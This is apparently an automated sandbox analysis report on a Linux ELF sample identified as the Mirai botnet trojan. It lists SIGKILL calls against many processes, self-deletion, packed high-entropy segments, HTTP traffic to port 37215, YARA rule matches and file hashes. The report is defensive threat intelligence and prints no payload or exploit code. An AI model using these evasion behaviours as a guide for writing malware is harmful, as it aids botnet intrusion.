Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6240, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6242, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6244, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6245, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6246, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6247, result: successful	Jump to behavior

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x8048000

Sample tries to kill a process (SIGKILL)

Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 772, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1532, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1622, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1633, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1638, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1664, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2146, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2223, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2302, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4333, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4438, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6185, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6215, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6237, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6235, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6239, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6240, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6242, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6244, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6245, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6246, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6247, result: successful	Jump to behavior

Yara signature match

Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_3a56423b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75, id = 3a56423b-c0cf-4483-87e3-552beb40563a, last_modified = 2021-09-16
Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_dab39a25 reference_sample = 3e02fb63803110cabde08e809cf4acc1b8fb474ace531959a311858fdd578bab, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 5a628d9af9d6dccf29e78f780bb74a2fa25167954c34d4a1529bdea5ea891ac0, id = dab39a25-852b-441f-86ab-23d945daa62c, last_modified = 2022-01-26

Source: classification engine

Classification label: mal84.spre.troj.evad.linELF@0/0@21/0

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/ul5RjxwWTK.elf (PID: 6209)

File: /tmp/ul5RjxwWTK.elf

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 34688 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59250 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58610 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35792 -> 37215

ELF contains segments with high entropy indicating compressed/encrypted content

Source: ul5RjxwWTK.elf	Submission file: segment LOAD with 7.895 entropy (max. 8.0)
Source: ul5RjxwWTK.elf	Submission file: segment LOAD with 7.9701 entropy (max. 8.0)

ID:	1428800
Product:	CloudBasic
Start time:	16:17:05
Start date:	19.04.2024
Sample:	ul5RjxwWTK.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	f3aec1734ebf34a7ca5b0674475023a7
SHA1:	d4447b3793cf6e497dae0107f93ce2dffddadc1c
SHA256:	8a0560ffc6fd06015192f3d164f0ca068138382e56357288d137fc5699f37e3d
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Linux Analysis Report ul5RjxwWTK.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
ul5RjxwWTK.elf